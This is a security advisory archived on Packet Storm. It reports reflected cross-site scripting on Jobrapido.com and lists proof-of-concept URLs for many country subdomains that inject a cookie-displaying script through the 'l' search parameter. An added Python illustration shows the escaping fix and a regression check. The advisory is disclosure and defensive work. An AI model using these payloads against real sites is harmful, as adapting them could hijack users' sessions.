Jobrapido.com Cross Site Scripting

2012-03-07T00:00:00
ID PACKETSTORM:110546
Type packetstorm
Reporter Ivano Binetti
Modified 2012-03-07T00:00:00

Description

                                        
                                            `+--------------------------------------------------------------------------------------------------------------------------------+  
# Exploit Title : Jobrapido.com Multiple XSS   
# Date : 07-03-2012  
# Author : Ivano Binetti (http://www.ivanobinetti.com)  
# Web site : http://www.jobrapido.com  
# Web master notification : 07/11/2011  
  
+--------------------------------------------------------------------------------------------------------------------------------+  
  
PoC:  
http://us.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://uk.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://it.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://ae.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://ao.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://ar.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://at.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://au.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://be.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://br.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
http://ca.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
  
This PoC works for all third-level domains.

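The bug class behind the PoC is unescaped reflection of the `w` and `l` search parameters into the page. The following is an added illustration, not code from the advisory or from Jobrapido: a toy renderer in its reflecting form beside the fixed form that HTML-escapes both parameters, plus a check that tells the two apart using the advisory's own payload. The `TEMPLATE` markup and the function names are assumptions for the demonstration.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# One of the PoC URLs from the advisory; the payload sits in the "l" (location) parameter.
POC_URL = ("http://us.jobrapido.com/?w=security"
           "&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E")

# Hypothetical page fragment that reflects the search terms (constructed for this example).
TEMPLATE = '<h1>Jobs for "{w}" in "{l}"</h1>'


def search_params(url):
    """Return the decoded w (what) and l (where) parameters of a search URL."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("w", [""])[0], qs.get("l", [""])[0]


def render_unsafe(url):
    """Reflects the raw parameter values into the markup: the class of bug reported above."""
    w, l = search_params(url)
    return TEMPLATE.format(w=w, l=l)


def render_safe(url):
    """Escapes both parameters for an HTML text/attribute context before reflecting them."""
    w, l = search_params(url)
    return TEMPLATE.format(w=escape(w, quote=True), l=escape(l, quote=True))


def reflects_raw_markup(url, page):
    """True if a parameter containing '<' or '>' appears verbatim (unescaped) in the page.

    Useful as a regression check: run a request with a harmless marker such as
    '<b>x</b>' in each parameter and fail the build if this returns True.
    """
    w, l = search_params(url)
    return any(("<" in v or ">" in v) and v in page for v in (w, l))


if __name__ == "__main__":
    print("unsafe:", render_unsafe(POC_URL))
    print("safe:  ", render_safe(POC_URL))
    print("unsafe reflects raw markup:", reflects_raw_markup(POC_URL, render_unsafe(POC_URL)))
    print("safe reflects raw markup:  ", reflects_raw_markup(POC_URL, render_safe(POC_URL)))
```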
+--------------------------------------------------------------------------------------------------------------------------------+  